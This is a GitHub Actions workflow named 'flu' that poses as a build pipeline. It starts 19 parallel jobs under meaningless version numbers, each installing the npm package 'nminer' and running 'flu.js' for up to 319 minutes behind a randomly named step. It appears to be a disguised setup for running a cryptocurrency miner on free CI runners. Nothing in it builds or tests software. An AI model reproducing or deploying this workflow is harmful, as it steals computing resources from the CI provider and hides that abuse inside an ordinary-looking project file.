name: flu
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 2042 }
          - { version: 4733 }
          - { version: 6118 }
          - { version: 5768 }
          - { version: 4525 }
          - { version: 4424 }
          - { version: 1914 }
          - { version: 3501 }
          - { version: 5611 }
          - { version: 9473 }
          - { version: 1390 }
          - { version: 3315 }
          - { version: 493 }
          - { version: 8265 }
          - { version: 6768 }
          - { version: 7078 }
          - { version: 3471 }
          - { version: 4860 }
          - { version: 8472 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: memorable multicolored
        run: |
          npm install nminer@latest
          timeout 319m node flu.js || echo "flu executed"